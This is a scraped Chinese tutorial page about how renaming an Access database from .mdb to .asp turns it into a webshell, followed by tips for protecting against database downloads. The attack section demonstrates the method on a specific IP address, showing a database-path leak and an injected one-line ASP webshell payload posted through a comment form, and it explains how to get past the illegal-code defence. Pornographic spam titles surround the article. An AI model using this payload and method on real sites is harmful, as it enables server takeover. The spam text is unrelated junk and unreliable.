校园春色亚洲色图_亚洲视频分类_中文字幕精品一区二区精品_麻豆一区区三区四区产品精品蜜桃

主頁 > 知識庫 > access改mdb為asp所帶來的災難 附mdb防下載方法

access改mdb為asp所帶來的災難 附mdb防下載方法
熱門標簽:智能電銷機器人適用于哪些行業 徐州人工智能電銷機器人好用嗎 長沙防封電銷卡品牌 地圖標注服務哪家好 西寧公司外呼系統平臺 騰訊地圖標注商戶關閉 地圖標注宅基地 武漢營銷電話機器人軟件 外呼系統還用卡么
先不說直接改后綴,直接可以用網快等工具直接下載,其實這樣你已經是為入侵者打開了大門。入侵者可以利用asp/asa為后綴的數據庫直接得到webshell。

一.思路

  大家都知道%%>為asp文件的標志符,也就是說一個asp文件只會去執行%%>之間的代碼,access+asp的web系統的所有數據都是存放在數據庫文件里(mdb文件),由于管理者把mdb文件改為了asp文件,如果我們提交的數據里包含有%%>,那當我們訪問這個asp數據庫的時候就會去執行%%>之間的代碼。這樣導致我們只提交惡意代碼給數據庫,那么asp后綴的數據庫就是我們的webshell了。

二.示例

  隨便找個目標,首先我們暴庫,看是不是asp后綴的數據庫:http://220.170.151.103/test/dlog%5cshowlog.asp?cat_id=5log_id=210


  返回:
復制代碼 代碼如下:

Microsoft VBScript 編譯器錯誤 錯誤 '800a03f6'
缺少 'End'

/iisHelp/common/500-100.asp,行242

Microsoft JET Database Engine 錯誤 '80004005'

'D:\log_mdb\%29dlog_mdb%29.asp'不是一個有效的路徑。 確定路徑名稱拼寫是否正確,以及是否連接到文件存放的服務器。

/test/conn.asp,行18


  我們提交:http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp返回一堆的亂碼,這樣我們可以直接用網際快車等工具直接下載數據庫(這里我們不討論)。我們回到主頁看到有提供“網友評論”功能。我們注冊個用戶,發一條評論:

%execute request("b")%>

  這樣我們就把asp代碼:%execute request("b")%>寫入了數據庫,那么數據庫:就是我們的webshell咯。提交:http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp在亂碼的最后我們看到:

復制代碼 代碼如下:

/iisHelp/common/500-100.asp,行242
Microsoft VBScript 運行時錯誤 錯誤 '800a000d'

類型不匹配: 'execute'

/test/dlog/log_mdb/%29dlog_mdb%29.asp,行1266


  注意:我們在向數據庫提交代碼時,代碼內容不可以太大。所以我們采用%execute request("b")%>。

三.其他一些問題和思路

  1.對于改了后綴為asp,還對數據庫里加入了%='a'-1%>等非法的asp代碼來徹底防止下載的數據庫,由于里面存在了非法的asp代碼,插入我們的webshell代碼后運行,將只會顯示前面非法代碼的錯誤,而不去執行我們shell的代碼。雖然這樣可以防止一定的攻擊,但還是存在一定的隱患,我們只要在出錯的代碼前加入兼容錯誤的代碼,就可以得到正確顯示執行我們插入的webshell代碼了。

  2.對于沒有改后綴的,也就是mdb文件,這樣我們可以先直接下載下來得到后臺密碼,進了后臺,可以利用數據庫備用改后綴為asp。

mdb防下載方法小結

1:在iis6下面 如果一個擴展名沒有被定義則 訪問的時候會出現文件沒有找到的404錯誤。
因此你可以將數據庫任意命名成一個絕對不會出現的文件名就可以達到安全的效果比如:xxxxx.xxxxxxxxxxx


2 將數據庫放在網站的外部,那絕對就不能訪問得到了。例如: e:/web/是你的網站
則把數據庫放在e:/

3 正如樓上所說的 將.mdb 改成 .asp 同時倒入一個特殊的表 包含 % 的二進制字符 這樣訪問文件出現 缺少腳本關閉符的提示。
4 或者將.mdb 改成.asp 同時用winhex打開 可以發現176以后有很長一部分 00 字符串 你隨便在處改成一段asp代碼 也可以實現防止下載,這樣也不影響數據庫功能。例如:
%
response.write("非法訪問")
response.end()
%>


現在在數據庫的名稱里 加上 “#” 和空格 都被破解了 比如“#” = “%35” 而空格 = “%20”

所以說 現在用這些已經不管用了。。


如果是自己的服務器的話就在IIS里設置一下:

新建一個空白的DLL文件,然后在IIS里添加映射,可執行文件選剛才建的這個DLL,擴展名填.mdb,保存后重啟一下IIS服務即可。
您可能感興趣的文章:
  • IIS下防止mdb數據庫被下載的實現方法
  • 九種防MDB數據庫被下載的方法小結

標簽:雅安 通化 通遼 荊門 普洱 巴彥淖爾 運城 鷹潭

巨人網絡通訊聲明:本文標題《access改mdb為asp所帶來的災難 附mdb防下載方法》,本文關鍵詞  access,改,mdb,為,asp,所,帶來,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《access改mdb為asp所帶來的災難 附mdb防下載方法》相關的同類信息!
  • 本頁收集關于access改mdb為asp所帶來的災難 附mdb防下載方法的相關信息資訊供網民參考!
    • 推薦文章
    校园春色亚洲色图_亚洲视频分类_中文字幕精品一区二区精品_麻豆一区区三区四区产品精品蜜桃
    免费一级片91| 亚洲欧洲成人精品av97| 在线成人高清不卡| 99国产精品久久久| 不卡视频在线看| 欧美三级韩国三级日本一级| 欧美一级片在线看| 国产精品欧美一级免费| 亚洲伊人色欲综合网| 国产乱国产乱300精品| k8久久久一区二区三区| 欧美影院午夜播放| 中文字幕第一页久久| 一区二区不卡在线视频 午夜欧美不卡在| 一区二区三区自拍| 国产精品一区免费视频| 欧美日韩高清一区二区| 亚洲人精品一区| 99久久精品国产网站| 精品乱人伦一区二区三区| 亚洲精品第1页| 色一情一乱一乱一91av| 国产日韩欧美高清在线| 久久国产夜色精品鲁鲁99| 91国偷自产一区二区使用方法| 久久亚洲综合av| 国产**成人网毛片九色| 精品伦理精品一区| 国产在线精品一区二区三区不卡 | 欧美影片第一页| 亚洲综合久久av| 欧美成人一区二区三区片免费 | 成人午夜激情视频| 亚洲国产成人va在线观看天堂| 久久综合九色综合欧美就去吻| 日本韩国欧美在线| 色天天综合色天天久久| 成人午夜伦理影院| 91蜜桃网址入口| 亚洲视频 欧洲视频| 老司机精品视频导航| 国产精品夫妻自拍| 欧美一区午夜精品| 69久久99精品久久久久婷婷| 欧美亚洲自拍偷拍| 99精品视频在线观看| 秋霞国产午夜精品免费视频| 亚洲国产综合人成综合网站| 一区二区三区丝袜| 一区二区三区日韩| 亚洲理论在线观看| 午夜伦理一区二区| 蜜臀91精品一区二区三区| 久久国产精品露脸对白| 精品无码三级在线观看视频| 国产一区二区精品久久99 | 亚洲国产高清aⅴ视频| 国产日韩精品一区二区三区在线| 国产色产综合色产在线视频| 国产精品看片你懂得| 亚洲自拍欧美精品| 国产精品99久久久久久似苏梦涵| 国产精品一区二区久久精品爱涩 | 欧美视频在线播放| 欧美电视剧免费全集观看| 国产精品视频在线看| 丝袜国产日韩另类美女| 国产成人综合精品三级| 欧美性猛交xxxx乱大交退制版| 日韩欧美一区二区不卡| 亚洲图片你懂的| 国产乱人伦精品一区二区在线观看| 99re视频精品| 久久先锋影音av鲁色资源| 亚洲黄网站在线观看| 国产黄人亚洲片| 日韩久久久精品| 日韩精品视频网站| 91美女片黄在线观看91美女| 精品久久免费看| 国模套图日韩精品一区二区| 欧美日韩国产一级| 性做久久久久久| 在线不卡的av| 日本女优在线视频一区二区| 欧美日韩综合在线| 午夜精品久久久久久久99樱桃| 91蝌蚪porny成人天涯| 综合分类小说区另类春色亚洲小说欧美| 韩国精品在线观看| 日本一区二区三区电影| 丁香激情综合五月| 日韩美女视频一区| 欧美自拍偷拍一区| 毛片av一区二区| 中文字幕av在线一区二区三区| eeuss影院一区二区三区| 亚洲天天做日日做天天谢日日欢| 欧亚洲嫩模精品一区三区| 五月天激情综合网| 久久影院午夜片一区| 色噜噜狠狠色综合欧洲selulu| 亚洲午夜精品17c| 久久久久久久久久久99999| 色综合天天综合| 国产一区二区三区在线观看免费 | 精品视频999| 国产一区二区三区免费观看| 亚洲制服欧美中文字幕中文字幕| 欧美日本在线看| 色婷婷av一区二区三区大白胸| 久热成人在线视频| 亚洲国产日韩在线一区模特| 久久无码av三级| 欧美不卡一区二区| 91精品中文字幕一区二区三区| 99久久婷婷国产| 国产成人综合亚洲网站| 精品一区二区精品| 欧美aⅴ一区二区三区视频| 亚洲电影一级黄| 一区二区三区色| 亚洲一区二区三区激情| 一区二区三区精品视频| 亚洲乱码国产乱码精品精的特点| 久久精品日韩一区二区三区| 久久久久久毛片| 国产欧美一区二区精品仙草咪| 久久伊人中文字幕| 337p粉嫩大胆色噜噜噜噜亚洲| 日韩精品一区在线| 久久免费美女视频| 中文字幕在线不卡视频| 一区二区三区四区在线| 日韩高清在线一区| 精品一区二区日韩| 99久久综合国产精品| 欧美综合色免费| 久久蜜桃一区二区| 一区二区三区四区在线播放| 日韩电影免费一区| 成人免费高清在线| 日韩欧美区一区二| 亚洲乱码精品一二三四区日韩在线 | 日韩免费视频一区二区| 久久精品夜夜夜夜久久| 亚洲影院理伦片| 国产一区 二区 三区一级| 日本丶国产丶欧美色综合| 欧美日韩一区在线观看| 国产三级一区二区三区| 午夜不卡av免费| 粗大黑人巨茎大战欧美成人| 欧美一级免费观看| 亚洲夂夂婷婷色拍ww47| hitomi一区二区三区精品| 久久综合国产精品| 麻豆精品新av中文字幕| 欧美日韩www| 亚洲chinese男男1069| 成人动漫视频在线| 国产精品国产三级国产aⅴ入口| 国内一区二区视频| 久久亚洲捆绑美女| 国产麻豆精品久久一二三| 日韩欧美激情一区| 国产一区二区免费看| 久久精品视频网| 成人动漫在线一区| 亚洲综合色噜噜狠狠| 欧美视频一区在线观看| 美国av一区二区| 国产欧美一区二区精品仙草咪 | 久久成人免费网| 91精品欧美一区二区三区综合在| 午夜不卡在线视频| 精品国产污污免费网站入口 | 亚洲国产毛片aaaaa无费看| 欧美久久免费观看| 精品一区二区三区不卡| 一区在线观看视频| 777午夜精品免费视频| 激情丁香综合五月| 亚洲尤物视频在线| 国产日韩欧美不卡在线| 欧美日韩一区二区三区不卡| 精品一区二区久久| 午夜不卡av免费| 1000精品久久久久久久久| 精品日本一线二线三线不卡| 99精品欧美一区二区三区小说| 免费日韩伦理电影| 一区二区三区中文字幕在线观看| 欧美人伦禁忌dvd放荡欲情| 成人免费av网站| 狠狠色狠狠色综合| 三级成人在线视频| 亚洲精品美腿丝袜| 国产精品美日韩| 欧美激情资源网|